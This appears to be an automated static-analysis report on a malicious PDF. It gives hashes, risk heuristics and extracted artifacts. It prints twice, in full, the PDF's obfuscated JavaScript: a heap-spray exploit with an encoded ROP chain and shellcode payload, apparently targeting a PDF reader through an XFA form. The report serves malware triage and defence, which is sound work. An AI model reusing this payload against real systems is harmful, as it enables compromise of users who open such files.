Malicious PDF — malware analysis report

Static analysis result for SHA-256 506f754f0e44c944…

MALICIOUS

PDF

53.5 KB First seen: 2026-05-11
MD5: bc2679b80755d42d848c67700286f2e9 SHA-1: 15b74ad0ae0bf0662beac051ebb8865ec6a4d934 SHA-256: 506f754f0e44c94444db4c4f23974eb9004718d54c1e5e36fd239c02b458e6be
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture (XFA), which can carry script logic alongside the form definition.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.bitstream.com — in PDF document text
    • http://ns.adobe.com/xdp/ — referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/ — referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/ — referenced by PDF JavaScript
    The three ns.adobe.com / xfa.org entries match the XML namespace URIs declared in the XFA stream (object 14, shown below) and should be read as schema identifiers, not as fetch or callback targets.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3748 bytes
SHA-256: 462d8551fc9c50b30883be88c0a5f552505dea38483602f2a002dad19b7fcf61
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUOb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw = unescape;
var nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc92b%ud7db%u74d9%uf424%u49b1%ube58%u359a%ub1ab%u7031%u0317%u1770%ue883%u78fc%u57c0%uf559%ua82b%u659a%u4da5%ub7ab%u06d1%u079e%u4b91%uec13%u7ff7%u80a0%u70df%u2e01%ube06%u9f92%u6c86%ube50%u6f7a%u6085%ua042%u61d8%udd83%u3313%ua95c%ua386%uefe9%uc21a%u643d%ubc22%ubb38%u76d7%uec42%u0d48%u140c%u49e2%u25ad%u8a27%u6c91%u784c%u6f61%ub184%u418a%u1de8%u6db5%u5ce5%u4af1%u2b16%ua909%u2bab%ud3ca%ube77%u74cf%u18f3%u8434%ufed0%u8abf%u759d%u8ee7%u5a20%uab93%u5da9%u3a74%u79e9%u6650%ue0a9%uc2c1%u1d1c%uaa11%ubbc1%u5959%ubd15%u3603%uf3da%uc6bb%u8474%uf4c8%u3edb%ub547%u9894%uba90%u5c8e%u450e%u9c31%u8206%ucc65%u2330%u8706%uccc0%u07d3%u6291%ue78c%uc341%u8f7c%ucc8b%uafa3%u06b3%u45cc%uc149%u98f9%u2350%u9896%u5252%u153a%u3eb4%u73d2%ud76e%ude4b%u46e4%uf593%u4980%uf91f%u0775%u74e8%uf066%uc318%u57d4%ufe26%u5873%u04b2%u0fd2%u062a%u6703%uf9f5%uf366%u6f3c%u6cc9%u7f4
1%u6cc9%u1517%u04c9%u4dcf%u319a%u5810%ue98e%u6285%u5ee7%u0a0d%ub805%u9579%ueff6%uea7b%ud620%u1af9%u3a47%u41c2' );
var nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.length + 20 + 8 < 65536) nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR+=nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL = nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.substring(0, (0x0c0c-0x24)/2);
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW = emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL.substring(0, 65536/2);
while(nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.length < 0x80000) nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW += nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW;
ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb = nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.substring(0, 0x80000 - (0x1020-0x08) / 2);
var iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG = new Array();
for (ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj=0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj<0x1f0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj++) iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG[ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj]=ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4634 bytes
SHA-256: 807083655ef966f54c51bd2f687d8342c637bde98d4b2f8d55682079c42ff2bf
Preview script
First 1,000 lines of the extracted script. Note: this preview runs past `endstream` into PDF objects 13–14, the xref table and the trailer, so the carved artifact appears to include file structure beyond the /JS stream itself; its script body is identical to that of javascript_obj0012_000.js above.
var OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw = unescape;
var nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc92b%ud7db%u74d9%uf424%u49b1%ube58%u359a%ub1ab%u7031%u0317%u1770%ue883%u78fc%u57c0%uf559%ua82b%u659a%u4da5%ub7ab%u06d1%u079e%u4b91%uec13%u7ff7%u80a0%u70df%u2e01%ube06%u9f92%u6c86%ube50%u6f7a%u6085%ua042%u61d8%udd83%u3313%ua95c%ua386%uefe9%uc21a%u643d%ubc22%ubb38%u76d7%uec42%u0d48%u140c%u49e2%u25ad%u8a27%u6c91%u784c%u6f61%ub184%u418a%u1de8%u6db5%u5ce5%u4af1%u2b16%ua909%u2bab%ud3ca%ube77%u74cf%u18f3%u8434%ufed0%u8abf%u759d%u8ee7%u5a20%uab93%u5da9%u3a74%u79e9%u6650%ue0a9%uc2c1%u1d1c%uaa11%ubbc1%u5959%ubd15%u3603%uf3da%uc6bb%u8474%uf4c8%u3edb%ub547%u9894%uba90%u5c8e%u450e%u9c31%u8206%ucc65%u2330%u8706%uccc0%u07d3%u6291%ue78c%uc341%u8f7c%ucc8b%uafa3%u06b3%u45cc%uc149%u98f9%u2350%u9896%u5252%u153a%u3eb4%u73d2%ud76e%ude4b%u46e4%uf593%u4980%uf91f%u0775%u74e8%uf066%uc318%u57d4%ufe26%u5873%u04b2%u0fd2%u062a%u6703%uf9f5%uf366%u6f3c%u6cc9%u7f4
1%u6cc9%u1517%u04c9%u4dcf%u319a%u5810%ue98e%u6285%u5ee7%u0a0d%ub805%u9579%ueff6%uea7b%ud620%u1af9%u3a47%u41c2' );
var nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR = OegXFBMYDbNrRVilQvGrMWdMgHQyRaccgHvNHrmkFiiiwRIEXvXCyCIRSCbpNZqSCw( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.length + 20 + 8 < 65536) nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR+=nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL = nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR.substring(0, (0x0c0c-0x24)/2);
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nteccopEHRwqeWwAEZJIOUybaHUAFxUoFyKssUObatNdZvOxEZajhAjZGISRqpnvLNQlgEKrPxtbbBJuEvn;
emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL += nrHSPMWFuvKnhzoGOjjTSMTkBJnOXmJNqVeOOR;
nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW = emfjJDGesJqLyNpzlBuqNjeIGtWTUAtutUXvDrpqdXEYmaiKxtL.substring(0, 65536/2);
while(nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.length < 0x80000) nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW += nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW;
ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb = nvDVZgXIemQHcIjgCaYXXoCypYsBAnIkeHQTXptcAnygyYVvWCMJbVJAabrFwMW.substring(0, 0x80000 - (0x1020-0x08) / 2);
var iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG = new Array();
for (ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj=0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj<0x1f0;ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj++) iYbOFeTEaVlqFJDPgxbwweUklxmPPqwpSgGTuIbbPXRmnPpatG[ZMHhhGFaFAHpeGOwauyEHcdveEbUEpj]=ZgaFfHPHgQfdzEpOINuCaiKalmrwsKGdUcWMJBApRURwihjLRKLmUjxlMb+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053914 00000 n
0000053947 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54433
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: 46b2eb7079bdedda12c79edf642758aa4835b9e9541a5ac2b8347cc9b9bf6e38
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C